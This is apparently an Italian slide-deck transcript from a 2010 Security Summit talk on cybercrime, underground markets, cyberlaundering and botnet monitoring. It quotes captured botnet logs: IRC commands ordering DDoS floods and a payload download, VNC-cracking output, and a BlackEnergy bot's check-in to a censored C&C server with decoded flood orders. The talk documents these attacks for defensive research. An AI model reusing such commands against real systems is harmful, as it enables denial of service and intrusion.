CyberCrime e dintorni ;) Security Summit Roma 10 Giugno 2010

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "CyberCrime e dintorni ;) Security Summit Roma 10 Giugno 2010"

Transcript

1 CyberCrime e dintorni ;) Security Summit Roma 10 Giugno

2 Relatori 2 Introduce e modera Paolo Colombo Senior Security Consultant Accenture Intervengono Raoul Chiesa ENISA PSG, CLUSIT Claudio Guarnieri Ricercatore indipendente Shadowserver Foundation Marco Pacchiardo Principal Consultant British Telecom

3 Agenda 3 Definizione di CyberCrime CyberCrime Underground Economy Cyberlaundering Botnet Conclusioni

4 Cybercrime 4 Definizione di CyberCrime Raoul Chiesa

5 Disclaimer

6 Raoul s Disclaimer 6 Le informazioni contenute in questa presentazione non infrangono alcuna proprietà intellettuale, nè contengono strumenti o istruzioni che potrebbero essere in conflitto con la vigente legislazione. I dati statistici ed i profili appartengono all Hackers Profiling Project (HPP), sotto il patrocinio dell UNICRI e dell ISECOM. I marchi registrati appartengono ai rispettivi proprietari. Le opinioni qui espresse sono quelle dell autore e non rispecchiano necessariamente quelle dell UNICRI, di altre agenzie delle Nazioni Unite, dell ENISA o del CLUSIT.

7 Raoul nobody Chiesa 7 Comitato Direttivo e Comitato Tecnico- Scientifico del CLUSIT ( ), socio Fondatore Membro del Permanent Stakeholders Group (PSG) dell ENISA European Network & Information Security Agency Senior Advisor, Strategic Alliances & Cybercrime Issues, UNICRI United Nations Interregional Crime & Justice Research Institute Mediaservice.net Board of Directors, ISECOM Institute for Security and Open Methodologies Board of Directors, OWASP Italian Chapter Associated Partner, TSTF Telecom Security Task Force ICANN (ALS)

8

9 Cos è il Cybercrime? 9 Wikipedia Italia non lo sa Wikipedia intl. risponde: Computer Crime

10

11 Cos è il Cybercrime? (2nd try!) 11 Computer crime - From Wikipedia, the free encyclopedia (Redirected from Cybercrime: Computer crime refers to any crime that involves a computer and a network, where the computers may or may not have played an instrumental part in the commission of the crime (Moore 2000). Netcrime refers, more precisely, to criminal exploitation of the Internet [1]. Issues surrounding this type of crime have become high-profile, particularly those surrounding hacking, copyright infringement, child porn, and child grooming. There are also problems of privacy when confidential information is lost or intercepted, lawfully or otherwise. On the global level, both governments and non-state actors continue to grow in importance, with the ability to engage in such activities as espionage, financial theft, and other cross-border crimes sometimes referred to as cyber warfare. The international legal system is attempting to hold actors accountable for their actions, with the International Criminal Court among the few addressing this threat. [2]

12 Cos è il Cybercrime? (2nd try!) 12 A prima vista, sembra che stiamo parlando di attori differenti, con scopi, obiettivi (target) e modelli criminosi differenti.

13 Hackers Profiling Project (UNICRI, ISECOM, CLUSIT) 13 PROFILE OFFENDER ID LONE / GROUP HACKER TARGET MOTIVATIONS / PURPOSES Wanna Be Lamer 9-16 years I would like to be a hacker, but I can t GROUP End-User For fashion, It s cool => to boast and brag Script Kiddie years The script boy GROUP: but they act alone SME / Specific security flaws To give vent of their anger / attract mass-media attention Cracker years The destructor, burned ground LONE Business company To demonstrate their power / attract mass-media attention Ethical Hacker years The ethical hacker s world LONE / GROUP (only for fun) Vendor / Technology For curiosity (to learn) and altruistic purposes Quiet, Paranoid, Skilled Hacker years The very specialized and paranoid attacker LONE On necessity For curiosity (to learn) => egoistic purposes Cyber-Warrior years The soldier, hacking for money LONE Symbol business company / End-User For profit Industrial Spy years Industrial espionage LONE Business company / Corporation For profit Government Agent years CIA, Mossad, FBI, etc. LONE / GROUP Government / Suspected Terrorist/ Strategic company/ Individual Espionage/ Counter-espionage Vulnerability test Activity-monitoring Military Hacker years LONE / GROUP Government / Strategic company Monitoring / controlling / crashing systems

14 Industrial Espionage: cos è? 14 (da wikipedia) Industrial espionage or corporate espionage is espionage conducted for commercial purposes instead of national security purposes. Espionage takes place in many forms. In short, the purpose of espionage is to gather knowledge about (an) organization(s). A spy may be hired, or may work for oneself.

15 Zooming 15 The term is distinct from legal and ethical activities such as examining corporate publications, websites, patent filings, and the like to determine the activities of a corporation (this is normally referred to as competitive intelligence). Theoretically the difference between espionage and legal information gathering is clear. In practice, it is sometimes quite difficult to tell the difference between legal and illegal methods. Especially if one starts to consider the ethical side of information gathering, the border becomes even more blurred and elusive of definition. Industrial espionage describes activities such as theft of trade secrets, bribery, blackmail, and technological surveillance. As well as spying on commercial organizations, governments can also be targets of commercial espionage for example, to determine the terms of a tender for a government contract so that another tenderer can underbid. Industrial espionage is most commonly associated with technology-heavy industries, particularly the computer and automobile sectors.

16 Una riflessione 16 Information can make the difference between success and failure; if a trade secret is stolen, the competitive playing field is levelled or even tipped in favor of a competitor. (ne parleremo dopo)

17 Cos è l Intelligence? (agenzie) 17 From wikipedia: (http://en.wikipedia.org/wiki/intelligence agency) An intelligence agency is a governmental agency that is devoted to the information gathering (known in the context as "intelligence") for purposes of national security and defense. Means of information gathering may include espionage, communication interception, cryptanalysis, cooperation with other institutions, and evaluation of public sources. The assembly and propagation of this information is known as intelligence analysis. Intelligence agencies can provide the following services for their national governments: provide analysis in areas relevant to national security; give early warning of impending crises; serve national and international crisis management by helping to discern the intentions of current or potential opponents; inform national defense planning and military operations; protect secrets, both of their own sources and activities, and those of other state agencies; and may act covertly to influence the outcome of events in favor of national interests. Intelligence agencies are also involved in defensive activities such as counter-espionage or counter-terrorism. Some agencies are accused of being involved in assassination, arms sales, coups d'état, and the placement of misinformation (propaganda) as well as other covert operations, in order to support their own or their governments' interests.

18 Cos è l Info Warfare? 18 From wikipedia: (http://en.wikipedia.org/wiki/information_warfare)

19 Cos è l Information Warfare? (cont.) 19 From wikipedia: (http://en.wikipedia.org/wiki/information_warfare ) Information warfare is the use and management of information in pursuit of a competitive advantage Over an opponent. Information warfare may involve Collection of tactical information, assurance(s) that one's own information is valid, spreading of propaganda or disinformation to demoralize the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces. Information warfare is closely linked to psychological warfare.

20 Attention, please! Se cerchiamo Cyber Warfare, Wikipedia sa di che cosa stiamo parlando! (anche se, lo inserisce sotto computer crimes.strana la vita eh ) The U.S. Department of Defense (DoD) notes that cyberspace has emerged as a national-level concern through several recent events of geo-strategic significance. Among those are included the attack on Estonia's infrastructure in 2007, allegedly by Russian hackers. "In August 2008, Russia again allegedly conducted cyber attacks, this time in a coordinated and synchronized kinetic and non-kinetic campaign against the country of Georgia. Fearing that such attacks may become the norm in future warfare among nation-states, the concept of cyberspace operations impacts and will be adapted by warfighting military commanders in the future.

21 Ma di che Paesi stiamo parlando? USA ( everywhere, always!) UK, Canada, Francia, Russia, Switzerland Brazil Israel & Palestinian National Authority Zimbabwe Middle East: Paesi amici (UAE, Saudi Arabia ) China India Pakistan North Korea (DPRK) South Korea Iran Tatarstan Kyrgyzstan Ingushetia (ex URSS) Myanmar Russia (Estonia, Georgia) Low Risk Average Risk High Risk

22 Ma cosa possono fare, esattamente? 22

23 Ma cosa possono fare, esattamente? /2 23

24 Esempi 24 Non penso sia necessario riepilogare, zoomare, commentare gli incidenti già avvenuti. E sufficiente elencarli.per lasciare la parola ai prossimi interventi.e ritornarci poi sopra tutti insieme, durante il dibattito: Estonia Cyber-war (2007) Russia-Georgia Cyber-war (2008) North-Korea Attacks (2009) Google-Cina Operation Aurora (2010)

25

26

27

28 Punti di contatto tra questi mondi? YES! 28 PC Zombie (botnet) -> approfittano dell utonto medio, sia in contesto corporate (company s policy permettendo.ma l utente riesce sempre, somehow, ad aggirarle!) che casalingo (broadband). 0-days : ad oggi, tutti su sistemi MS Windows 0-days : ad oggi, nessuna vulnerabilità non nota exploitata, ma bugs su IE6.0 (!) & co (per l attacker) cambia poco/oramai quasi nulla, ownare i 100/1000 PC dell azienda X, o 100 broadband di utenti finali

29 29

30 30 Videoclip (3 minuti, Olanda)

31 Per concludere (e riflettere) 31

32 Cybercrime 32 Cybercrime Underground Economy Claudio Guarnieri

33 Keywords 33 Cybercrime Black Market Malware Botnets Malicious Software Reti (networks) di computer infetti controllati, tramite dei malware robot automatizzati, da un entità criminale. Derivate dei Remote Administration Tool, ma con target di massa.

34 Black Market 34 Administrator Administrator Guarantors Moderator Moderator Moderator Moderator Trial Seller Trial Seller Verified Seller Verified Seller Verified Seller Verified Seller Verified Seller Verified Seller User User User User User User User User User User User User User User User User

35 Il Black Market visto da Customer 35 Crearsi una struttura per inserirsi nel cybercrime e nel suo relativo mercato non è difficile e si può essere operativi con un investimento minimo e nessuna particolare competenza tecnica. Toolkit per Infezione di massa Acquisto Malware Acquisto Traffico Encrypting Malware Acquisto Servizio di Hosting

36 Guarantors 36 In Verifica. Questi Forum sono amministrati dai Guarantors, che si fanno garanti di ogni vendita. I Guarantors verificano ogni offerta di vendita certificando prodotto e venditore ed approvando così la commercializzazione sul proprio portale. Per questo servizio molto spesso richiedono ai verified seller o una tassa di iscrizione o una percentuale su ogni vendita.

37 Malware Developers 37 In questo Forum Post il venditore offre un malware di nome SpyEye con features di Keylogging e Grabbing di credenziali HTTP e FTP. 500$

38 Packers Developers 38 In quest altro post il venditore offre un servizio di Packing di malware, che permetterebbe il bypass di tutti i Firewall e Antivirus ed il bypass dell User Access Control di Windows Vista e Windows 7. Supporto 24/7. 488$ o 200$ al mese

39 Exploit Kits Developers 39 In questo post viene venduto un Exploit Kit completo di exploits per Internet Explorer, Adobe Reader, Flash, Microsoft DirectShow ed Excel. 800$

40 Bulletproof Hosting 40 In questo post vengono offerti servizi di Hosting di vario tipo (Shared, VPS, Dedicated etc.). Piani tariffari e tecnici personalizzati, anonimato, sistema anti-black che permette il bypass di sistemi di spam filtering e malware listing. Tariffario non pubblico :-(

41 Bulletproof Hosting (2) 41

42 Traffic Sellers 42 Traffico da siti/utenti compromessi in US, GB, AU, CA e DE 1000 visite a 7$ acquisto minimo 5000 visite In questo caso è messo in vendita del Traffic, ossia quantità di richieste HTTP di utenti ignari su siti legittimi, ma compromessi, che vengono redirette a domini malevoli (di proprietà dell acquirente) generalmente ospitanti degli Exploit Kits. Molto spesso viene generato traffico in vendita anche tramite MSN spam.

43 Da Customer a Seller 43 Diretto Botnet Master Indiretto Vendita Botnet Programmi di Affiliazione DDoS Rental Vendita Identità Spam Campaigns Click Fraud Campaigns Fake AV Campaigns Vendita CC

44 DDoS Rental 44 Stanchi dei vostri concorrenti? Stanchi del nemico? Questo venditore offre servizi di Distributed Denial of Service su richiesta. Disponibilità e supporto 24/7, test gratuito di 5-10 minuti. 60$/giorno 120$/giorno se protezione anti-ddos

45 Carding 45 US visa/us master $2.5 Random ITALY cc $17 BOA, CITI, CHASE.COM LOGIN +PASS FULLS COMPLETE BALANCE: $25000 verified PRICE: $525

46 Carding (2) 46 Per certificare la propria credibilità vengono spesso inseriti dai dati di Carte di Credito Demo, ossia disponibili all eventuale acquirente per verificare che il venditore sia in buona fede. Questo caso è completo di qualsiasi informazione relativa al possessore della carta.

47 Carding (3) 47 Un account PayPal con saldo di 1000$ 50$ Un account Bank of America con saldo da 75000$ a $ 300$ Pagamenti tramite LibertyReserve.com e WesternUnion

48 Carding (4) 48 I Carders non fanno certo segreto del proprio mercato :-)

49 Spam Campaigns 49 Uno dei metodi più proficui per un gestore di Botnet è lo Spam. In questo post una organizzazione di nome EvaPharmacy offre affiliazione per Botnets. In cambio di una campagna di Spam offrono il 45% per ogni acquisto da 60$ a 100$ proveniente dalla propria campagna. L 85% dello Spam totale è stimato provenire da Botnets.

50 Click Fraud Campaigns 50 In base alle statistiche di ClickForensics il Cybercrime nel 2008 ha ricavato 33 milioni di dollari da campagne di Click Fraud.

51 Fake AntiVirus Campaigns 51

52 Fake AntiVirus Campaigns (2) 52 Recentemente è stato incriminato un gruppo di criminali autori di una campagna di Fake AV Fraud che secondo gli inquirenti ha fruttato circa 100 milioni di dollari.

53 53 Cyberlaundering Marco Pacchiardo CYBERCRIME

54 Cos è? 54 E il riciclaggio di denaro in modo elettronico Utilizzato per ripulire denaro proveniente da attività illecite o utilizzato per finanziare attività illecite Si basa principalmente su 3 concetti: Placement Layering Integration

55 Placement Layering Integration 55

56 Placement Integration Layering 56 Banca 1 Banca 2 Banca 3 Banca 4 Banca 5 Banca 6 Banca 7 Banca 8 Banca off shore Beni immobili Azienda off shore Azienda Ghost Beni di lusso

57 Vantaggi 57 Placement Layering Integration Peso / Volume Disintermediazione Frazionamento Bassa Rintracciabilità Movimentazione elettronica Alta Velocità Basso Controllo Assenza di contatto Nessun registro / log

58 Esempi 58 Placement Layering Integration E-Gold IVTS SHELL / GHOST / FRONT COMPANIES PC / PALMARE ATM DENARO ELETTRONICO O IMPALPABILE PARADISI FISCALI BENI IMMOBILI E DI LUSSO INTERNET GAMBLING SOCIAL NETWORK smaterializzazione materializzazione

59 Esempi di Placement 59 Hawala Fen C hui Droga al dettaglio Acquisto ebay card Second Life Carte pre pagate Viaggi di piacere

60 Esempi di Layering 60 Suddivisione denaro su n conti Acquisto beni su ebay IVTS -> Hawala / Fen C hui Suddivisione su n aziende

61 Esempi di Integration 61 Acquisto appartamenti e beni immobili Conto su banca off-shore Acquisto titoli di stato Riconciliazione carte e IVTS E-Gold

62 Placement 62 Utilizzo identità false (persone, aziende) Smurfing (telefono, sistemi on-line, carte prepagate..) Trasferimenti di denaro verso banche offshore (utilizzo di internet, criptazione, draft ...) IVTS Loan-back (prestito su compagnie offshore)

63 Placement (2) 63 e-gold, Goldmoney, e-bullion, AnonymousGold Utilizzo di ATM con card per e-gold Mpay Paysafecard (ma non è possibile Layering e Integration perchè non permette pagamenti person-to-person) Modex, Proton, VisaCash

64 Esempi 64 Placement Layering Integration

65 Esempi (2) 65 Placement Layering Integration Banca Israeliana Banca di origine Banca a Panama

66 Esempi 66 Placement Layering Integration

67 Internet Service Provider 67 The persons on investigation were directors of a company involved in purchasing large quantities of duty free cigarettes and alcohol to sell on the domestic market contrary to their export-duty free status, thus avoiding tax obligations. In one file, the bank account in Belgium of an individual was credited by wire transfers from an Internet payment service provider (small amounts for a total of EUR 4 700). The subject was under investigation in another European country for the sale of drug starters. Information from law enforcement confirmed that the subject was selling drug starters via a commercial website. On 27 April 2007, a federal grand jury in Washington, D.C., indicted two companies operating a digital currency business and their owners. The indictment charges E-Gold Ltd., Gold and Silver Reserve, Inc., and their owners with one count each of conspiracy to launder monetary instruments, [...]. According to the indictment, persons seeking to use the alternative payment system E-Gold were only required to provide a valid address to open an E-Gold account no other contact information was verified. The majority of the wire transfers are of small amounts (maximum EUR 800), originate from various senders and, following the message accompanying the payment, should be related to sales on a commercial website, sometimes the sales of luxury goods. Payments are not made through an Internet payment service provider but originate from the bank account of the buyer and are credited on the bank account of the seller. The wire transfers are followed by instant withdrawals in cash. The goods are never delivered to the buyer (victim of a non-delivery fraud).

68 Calcio? 68 The FIU of country B received a disclosure from a bank with regard to suspicious transactions concerning club A. This club, which was in financial difficulties, was looking for funds (several million EUR) in order to avoid bankruptcy. A financing proposal was put forward by a financial group established in South America. It was linked to an individual that had already invested funds in various foreign clubs. These funds were suspected to be of illegal origin. After the bank inquired into the origin of the funds the financial group withdrew from the negotiations. A second financing proposal was then put forward by Mr. COX, a European investor through his company located in a tax haven. Suspicions were aroused because this individual, unfamiliar to the world of sports, had suddenly suggested investing money of unknown origin in club A. Additional information showed that Mr. COX was known to the police and FIU for various cases of fraud. In this case the different possibilities for investing in club A can be considered to be attempts to launder money of illegal origin. Italy has experienced an attempt to launder money through the purchase of a famous Italian football team. The investigations16 to detect the case started from judicial proceedings in The Procura della Repubblica suspected that financial crimes were occurring, such as, money laundering, insider trading and misuse of market information.. [ ] Investigations uncovered evidence that the money used to buy the shares was supplied by a criminal association operating in Central Italy. Further, a part of that money, supposedly offered to the football team as sponsorship, was then diverted to another company to purchase real estate, which was subsequently seized by Italian judicial authorities. Investigators identified that the criminal association was strongly interested in purchasing the football team with funds obtained from several offences.

69 Giochi? 69 Casinò on line per riciclare proventi di droga SecondLife: pagamento droga con soldi virtuali SecondLife: Multi-avatar per pagare merce virtuale a se stessi Vendita di soldi virtuali ad altri giocatori

70 Banche e Finanza 70 Clearing House Interbank Payments System (CHIPS)

71 LEGISLAZIONE INTERNAZIONALE 71 Trasferimento di denaro Direttiva 2001/97/EC, Articolo 3 -> log oltre US Patriot Act Section 326 -> $ /60/CE prevenzione dell'uso del sistema finanziario a scopo di riciclaggio dei proventi di attività criminose e di finanziamento del terrorismo Direttive FATF 40 Direttive + 19 raccomandazioni

72 Legislazione 72 United Nations (UNODC) Vienna Convention: Convention Against Illicit Traffic in Narcotic Drugs and Psychotropic Substances, 19 December, 1988 International Convention for the Suppression of the Financing of Terrorism, 9 December, 1999 Palermo Convention: Convention Against Transnational Organized Crime, 15 November, 2001 UN Security Council Resolutions European Union (EU) Strasbourg Convention: Convention on Laundering, Search, Seizure and Confiscation of the Proceeds from Crime, 8 November, 1990 Council common position on combating terrorism (2001/930/CFSP), 27 December, 2001 Council common position on the application of specific measures to combat terrorism (2001/931/CFSP), 27 December, 2001 Warsaw Convention: Council of Europe Convention on Laundering, Search, Seizure and Confiscation of the Proceeds from Crime and on the Financing of Terrorism, 16 May, 2005 Directive 2005/60/EC, 26 October, 2005 Financial Action Task Force (FATF) 40 Recommendations, June, Special Recommendations, 22 October, 2004 Egmont Group of Financial Intelligence Units Statement of Purpose, 23 June, 2004

73 FATF membri, di cui 33 giurisdizioni 2 organizzazioni regionali (Gulf Cooperation Cuncil & European Commission)

74 FATF Working Groups 74

75 Esistono delle contromisure? 75 Esistono dei software che per loro natura sono localizzati Esiste una legislazione frammentata e degli enti intrenazionali Parere personale: Lavoro di intelligence a livello internazionale Network informale: persone, non enti Intensificazione della Digital Forensics Conoscenza delle tecniche di CyberCrime e delle tecnologie utilizzate

76 Cybercrime 76 Botnet Claudio Guarnieri

77 Rete di computers infetti (zombies) controllati da specifici malware chiamati: Bot Una o più reti di questo tipo sono controllate da un entità criminale comunemente chiamata: Botmaster Botnet Ogni Botnet è gestita e comandata dal proprio Botmaster tramite un: Command & Control (C&C) Il Botmaster sfrutta i dati, la capacità computazionale e la rete di ogni zombie per specifiche Campagne Criminali 77

78 Utilizzi delle Botnets 78 DDoS Keylogging Scareware, Adware Installing Spamming Sniffing Rubare altre Botnets? Mass Identify Theft

79 Formazione e Propagazione Una Botnet per formarsi e crescere deve raccogliere zombies i quali passano attraverso tre fasi: 79 Exploiting Infecting Assimilating Più una Botnet dispone di zombies più potenza di fuoco avrà. Per questo motivo molto spesso i bot vengono forniti di funzioni per spreading su Internet.

80 Gestione e Controllo Ogni Botnet è controllata e gestita tramite un Command & Control (C&C), che è un interfaccia tra gli zombies e il Botmaster. 80 In figura uno schema che rappresenta una struttura di Command & Control centralizzato. Nonostante esistano molti esempi di Botnet Peer 2 Peer (Storm, Waledac etc.) ci concentreremo su questa struttura essendo la più comune. In particolar modo vedremo Botnet basate su Internet Relay Chat (IRC).

81 Qualche Numero Questo grafico mostra il numero approssimativo di Botnets monitorate attivamente dall infrastruttura di Shadowserver Foundation negli ultimi 6 mesi: Ogni Botnet ha un ciclo di vita di una durata generalmente determinata a seconda del proprio scopo.

82 C&C Geolocation Questa mappa rappresenta la distribuzione geografica dei C&C attualmente conosciuti a Shadowserver.

83 Zombies Geolocationing In questa mappa sono rappresentati gli Zombies rilevati da Shadowserver nell arco di 24 ore. E una stima approssimativa e in parte fin troppo ottimistica.

84 Shadowserver Tracking Process 84 80

85 Infiltrazione fai-da-te Snoopyd è un framework per Botnet Infiltration. E fornito di un demone XMLRPC che rimane in ascolto per richieste di infiltrazione. Per ora supporta solo IRC, ma è in sviluppo il supporto per Botnet HTTP. Ogni drone monitora l attività della Botnet e invia ogni informazione ad un DataBase. Per ogni richiesta ricevuta, Snoopyd effettua il deployment di un drone che replica la connessione di un vero zombie Bot.

86 Snoopyd Snoopyd è fornito di una semplice Web Interface che permette di visualizzare i risultati del monitoring.

87 Snoopyd (2) Per ogni Botnet monitorata vengono presentate delle informazioni riassuntive: hostname, IP, reverse DNS, geolocation e parametri di connessione.

88 Snoopyd (3) Il traffico della Botnet monitorata viene salvato interamente in una base di dati.

89 IRC Internet Relay Chat è un protocollo di comunicazione TCP/TLS. E basato su dei channel, ossia delle chatroom in cui gli utenti possono incontrarsi e comunicare. IRC è comunemente usato nel cybercrime sia come strumento di comunicazione e piazza di vendita sia come base operativa per la gran parte di Botnets. In questi casi il server e canale IRC rappresentano il C&C della Botnet dove tutti gli zombie si collegano in attesa di ricevere istruzioni dal Botmaster.

90 Assimilazione nella Botnet Connessione al C&C e ingresso nel canale: -> NICK ITA 00 XP SP2 L > USER pajgsqbz 0 0 :ITA 00 XP SP2 L <- Welcome to the [CENSORED] IRC Network ITA 00 XP SP2 L ! <- AUTH :*** Found your hostname (cached) <- AUTH :*** Looking up your hostname... -> JOIN ##sodoma_3 s0dom4j03 <- ##sodoma_3 :.root.start dcom a -r s <- ##sodoma_3 drake <- ##sodoma_3 :ITA 00 XP SP2 <- ##sodoma_3 :End of /NAMES list. Una volta entrato il bot per prima cosa legge il titolo del canale ed eseguo il comando in esso contenuto.

91 Gestione della Botnet Il Botmaster entra in canale: NeO_Anderson joined #a <Guard-v1_5> Welcome to #a sir, may I take your coat? ;-) Il Botmaster effettua l autenticazione e comanda un download: <ddos>.login s3x <ddos>.download C:install.exe 1

92 Sodoma Botnet Come nostro primo esempio vediamo una Botnet, gestita da Italiani, di basso profilo ma istruttiva.

93 Sodoma Botnet (2) <KrOwN>.irc.activate c0d1am0z3 -s<krown>.root.stop -s <drake>.ddos.icmp 77.xxx.xxx.xxx 450 -s <KrOwN>.ddos.supersyn 109.xxx.xxx.xxx s <KrOwN>.ddos.hack 94.xxx.xxx.xxx s.ddos.ack? :-P Gli attacchi DDoS seguenti hanno come bersaglio altri C&C: <KrOwN>.ddos.supersyn 82.xxx.xxx.xxx s <KrOwN>.ddos.supersyn 79.xxx.xxx.xxx s <KrOwN>.ddos.supersyn 213.xxx.xxx.xxx s La maggior parte di queste Botnet nemiche sono italiane.

94 Sodoma Botnet (3) CENSORED

95 F*****g Botnet In questo caso la Botnet è di dimensioni notevoli (Circa Zombies), pericolosa e molto attiva.

96 F*****g Botnet (2) * ddos sets +v to [M]ARG <ddos>.login s3x <[M]ARG 04428> -main- Password accepted. <ddos>.icmp 69.xxx.xxx.xxx 200 <[M]ARG 04428> -icmp- Flooding: (69.xxx.xxx.xxx) for 200 seconds. <[M]ARG 04428> -icmp- done with flood to 69.xxx.xxx.xxx. sent KB/sec (1MB). <ddos>.skysyn 69.xxx.xxx.xxx <[M]ARG 04428> -skysyn- Flooding: (69.xxx.xxx.xxx:53) for 100 seconds. <ddos>.download C:install.exe 1 <[M]ARG 27537> -download- Downloading URL: to: C:install.exe. <[M]ARG 27537> -download- downloaded KB to 18.8 KB/sec <[M]ARG 27537> -download- opened C:install.exe

97 F*****g Botnet (3) L organizzazione dietro alla gestione di questa Botnet risulta essere di origine Serba. Il loro target nell arco di 15 giorni di monitoring è sempre stato un Network sospetto (molto simile a RBN) di origine Pakistana. Anti-DDoS Infrastructures Datacenters Hosting Network Pakistana sospetta

98 F*****g Botnet (4) CENSORED

99 VNC Botnet Questa è sicuramente la Botnet più pericolosa che analizzeremo oggi. Come il nome suggerisca si occupa di violare accessi VNC.

100 VNC Botnet (2) Questa Botnet in un periodo di 10 giorni di monitoring aveva all attivo circa zombies ad occuparsi di cercare e violare macchine con VNC vulnerabili, le cui credenziali vengono passate in chiaro nel canale. <[nlh-vnc]njrold> [RAGE SCAN:] range: 71.x.x.x/94 threads. <[nlh-vnc]ozburt> [RAGE SCAN:] range: 87.x.x.x/94 threads. <[nlh-vnc]cdnvon> VNC3.6 CRACKED ([CENSORED]) 76.xxx.xxx.xxx 1234 <[nlh-vnc]unsuii> VNC3.8 CRACKED ([CENSORED]) 213.xxx.xxx.xxx authbypass <[nlh-vnc]llpdpl> VNC3.6 CRACKED ([CENSORED]) 64.xxx.xxx.xxx <[nlh-vnc]zyzavm> VNC3.8 CRACKED ([CENSORED]) 84.xxx.xxx.xxx <[nlh-vnc]vaxtjr> VNC3.3 CRACKED ([CENSORED]) 91.xxx.xxx.xxx 1234 <[nlh-vnc]sxlrmy> VNC3.6 CRACKED ([CENSORED]) 83.xxx.xxx.xxx 1234 <[nlh-vnc]ppmoyi> VNC3.6 CRACKED ([CENSORED]) 201.xxx.xxx.xxx admin <[nlh-vnc]qsggos> VNC3.7 CRACKED ([CENSORED]): 201.xxx.xxx.xxx - [NoPass]

101 VNC Botnet (3) Nell arco di 10 giorni sono state compromesse un totale di circa macchine complete di IP e Password

102 VNC Botnet (4) Decine di macchine appartenenti a reti universitarie di ogni parte del globo. La maggior parte appartenenti a dipartimenti di Information Technology (:-P) Molte appartenenti a reti inter-universitarie e Research Networks Macchine appartenenti a laboratori di ricerca governativi Macchine appartenenti ad Investment Groups di primo piano Appartenenti a famosi siti di e-commerce Molte compagnie telefoniche Appartenenti a Ministeri (anche di Informatica e delle Comunicazioni) Sì, ce ne sono anche di Italiane :-(

103 VNC Botnet (5) <sh3llx> you bastard <sh3llx> like to spy? *** You are permanently banned from M0dded MrAnToN (pwned By sh3llx!) ERROR :Closing Link: [nlh-vnc]wpjscd (User has been permanently banned from M0dded MrAnToN (pwned By sh3llx!)) I droni per monitoring essendo una replica solo marginale del comportamento di un Bot reale prima o poi vengono identificati e banditi dal C&C. Molto spesso dopo che vengono scoperti degli infiltrati, l intera Botnet viene clonata e spostata in un altra sede.

104 Botnets HTTP Nonostante le Botnet IRC siano ancora molto diffuse e le più educative da monitorare, negli ultimi 2-3 anni osserviamo un importante aumento di C&C HTTPbased. Zombie HTTP C&C Assimilazione

105 ZeuS Builder

106 ZeuS Control Il Control Panel di ZeuS offre un interfaccia Web molto user-friendly.

107 ZeuS Control (2) Per ogni autenticazione HTTP intercettata viene creato un comodo report con tutte le credenziali a disposizione.

108 Blackenergy

109 Blackenergy (2) Il Bot una volta installato contatta un server HTTP su cui effettua una richiesta POST che serve sia per registrare lo Zombie nel C&C sia per ottenere istruzioni da eseguire. POST /dot/stat.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;.NET CLR ) Host: [CENSORED].cn Content-Length: 31 Cache-Control: no-cache id=xxx_xxxxxxx&build_id=d5729

110 Blackenergy (3) La risposta del server sono delle istruzioni da eseguire encodate in Base 64: HTTP/ OK Date: Tue, 25 Sep :30:13 GMT Server: Apache/ (Unix) FrontPage/ PHP/5.2.3mod_ssl/ OpenSSL/0.9.7e-p1X-Powered-By: PHP/5.2.3 Content-Length: 80 Connection: close Content-Type: text/html MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3[ CENSORED]==

111 Blackenergy (4) ;2000;10;0;0;30;100;3;20;1000;2000#wait#10#xXXX_XXXXXX 10;3000;10;1;0;30;10;25;15;2000;3000#flood http [CENSORED].org.ua#5#xXXX_XXXXXX 10;2000;10;1;0;30;50;50;20;1000;2000#flood syn 80,81,82,83,443,25,22,21,110#10#xXXX_XXXXXX

112 Blackenergy (5)

113 TweBot Builder

Spionaggio Industriale VS ICT

Spionaggio Industriale VS ICT Spionaggio Industriale VS ICT La situazione ad oggi Raoul Chiesa, CLUSIT Socio Fondatore, Membro del CD e del CTS Security Summit 2010, Milano, 18 Marzo Abstract Questa presentazione intende fornire una

Dettagli

KASPERSKY SECURITY INTELLIGENCE SERVICES

KASPERSKY SECURITY INTELLIGENCE SERVICES KASPERSKY SECURITY INTELLIGENCE SERVICES Fabio Sammartino Pre-Sales Manager Kaspersky Lab Italia KASPERSKY LAB MAJOR DISCOVERIES Duqu Flame Gauss miniflame Red October NetTraveler Careto/The Mask 3 MALWARE

Dettagli

Attacchi informatici: evoluzione delle tecniche e dei

Attacchi informatici: evoluzione delle tecniche e dei Attacchi informatici: evoluzione delle tecniche e dei profili degli attaccanti Raoul Chiesa (OPST, OPSA) Socio Fondatore, Membro del Comitato Direttivo CLUSIT Board of Directors Member: ISECOM, OWASP Italian

Dettagli

User Guide Guglielmo SmartClient

User Guide Guglielmo SmartClient User Guide Guglielmo SmartClient User Guide - Guglielmo SmartClient Version: 1.0 Guglielmo All rights reserved. All trademarks and logos referenced herein belong to their respective companies. -2- 1. Introduction

Dettagli

Mobile Insecurity. Manno, 28 Settembre 2011 D Amato Luigi

Mobile Insecurity. Manno, 28 Settembre 2011 D Amato Luigi Mobile Insecurity Manno, 28 Settembre 2011 D Amato Luigi About us n Luigi D Amato: Senior CyberSecurity Consultant e CTO di Security Lab SAGL. Membro ufficiale del chapter italiano dell Honeynet Project

Dettagli

CONFIGURATION MANUAL

CONFIGURATION MANUAL RELAY PROTOCOL CONFIGURATION TYPE CONFIGURATION MANUAL Copyright 2010 Data 18.06.2013 Rev. 1 Pag. 1 of 15 1. ENG General connection information for the IEC 61850 board 3 2. ENG Steps to retrieve and connect

Dettagli

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director Banking Cybercrime: Attacchi e scenari di banking malware in Italia Giorgio Fedon Owasp Italy Technical Director IEEE-DEST 2012 giorgio.fedon@owasp.org Copyright The OWASP Foundation Permission is granted

Dettagli

La sicurezza informatica. Luca Filippi Luca.Filippi@seclab.it

La sicurezza informatica. Luca Filippi Luca.Filippi@seclab.it La sicurezza informatica Luca Filippi Luca.Filippi@seclab.it Che cos è SecLab 04/04/2015 http://www.seclab.it 2 Che cos è la sicurezza informatica Le informazioni vanno protette contro chi vuole appropriarsene

Dettagli

The OWASP Foundation http://www.owasp.org

